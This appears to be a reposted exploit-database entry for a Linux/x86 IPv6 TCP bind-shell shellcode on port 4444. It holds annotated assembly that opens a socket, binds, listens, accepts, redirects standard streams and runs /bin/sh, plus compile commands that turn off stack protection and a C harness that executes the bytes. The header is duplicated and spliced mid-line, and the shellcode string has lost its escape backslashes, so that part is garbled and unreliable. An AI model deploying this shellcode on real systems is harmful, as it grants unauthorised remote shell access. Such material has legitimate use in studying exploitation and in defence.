Linux x86 IPv6 TCP Bindshell Port 4444 Shellcode

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 264

// # Title: Linux/x86 - IPv6 TCP bind tcp shell on 4444 port
// # Length : 113 bytes
// # Author : Matteo Malvica
// # Tested On : kali linux 4.15
// # Contact : matteo@malvica // # Title: Linux/x86 - IPv6 TCP bind tcp shell on 4444 port
// # Length : 113 bytes
// # Author : Matteo Malvica
// # Tested On : kali linux 4.15
// # Contact : matteo@malvica.com
// # Description: it creates an IPv6 socket on localhost ::1 and listens on port 4444

/*

global _start
section .text

_start:

;; ipv6 socket creation
push 0x6 ; protocol IPv6
push 0x1 ; socket_type=SOCK_STREAM (0x1)
push 0xa ; AF_INET6
xor eax,eax ; zero out eax
xor ebx,ebx ; zero out ebx
mov al,0x66 ; syscall: sys_socketcall + cleanup eax register
inc ebx ; 1 = SYS_socket
mov ecx,esp ; save pointer (ESP) to socket() args (ECX)
int 0x80
mov esi,eax ; saves socket descriptor
xor eax,eax

;;bind
push DWORD eax ;ipv6 loopback pushed as x4 dword
push DWORD eax
push DWORD eax
push DWORD eax
push DWORD eax ;sin6_addr
push WORD 0x5c11 ;port 4444
push WORD 0x0a ;AF_INET6
mov ecx,esp
push 0x1c
push ecx
push esi
dec ebx
mov bl,0x2
mov ecx,esp
mov al,0x66
int 80h

;;listen
xor eax,eax
xor ebx,ebx
push byte 0x2
push esi
mov ecx,esp
mov bl,0x4
mov al,0x66
int 80h

;;accept
xor ebx,ebx
push ebx
push ebx
push esi
mul ebx
mov bl,0x5
mov al,0x66
mov ecx,esp
int 80h

sub ecx, ecx
mov cl, 0x2 ;initiate counter
xchg ebx,eax ;save clientfd

; loop through three sys_dup2 calls to redirect stdin(0), stdout(1) and stderr(2)
loop2:
mov al, 0x3f ;syscall: sys_dup2
int 0x80 ;exec sys_dup2
dec ecx ;decrement loop-counter
jns loop2 ;as long as SF is not set -> jmp to loop

;;execve(/bin//sh)
xor edx,edx
push edx ;null terminated /bin//sh
push 0x68732f2f ;"hs//"
push 0x6e69622f ;"nib/"
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al,0x0b ;execve()
int 0x80

*/

/*
to compile the shellcode

$gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
$./shellcode

*/

#include <stdio.h>

unsigned char shellcode[] =
"x6ax06x6ax01x6ax0ax31xc0x31xdbxb0x66x43x89xe1xcdx80x89xc6x31xc0x50x50x50x50x50x66x68x11x5cx66x6ax0ax89xe1x6ax1cx51x56x4bxb3x02x89xe1xb0x66xcdx80x31xc0x31xdbx6ax02x56x89xe1xb3x04xb0x66xcdx80x31xdbx53x53x56xf7xe3xb3x05xb0x66x89xe1xcdx80x31xc9xb1x02x93xb0x3fxcdx80x49x79xf9x31xd2x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53x89xe1xb0x0bxcdx80";

main()
{
printf("Shellcode Length: %d ", sizeof(shellcode) - 1);
int (*ret)() = (int(*)())shellcode;
ret();
}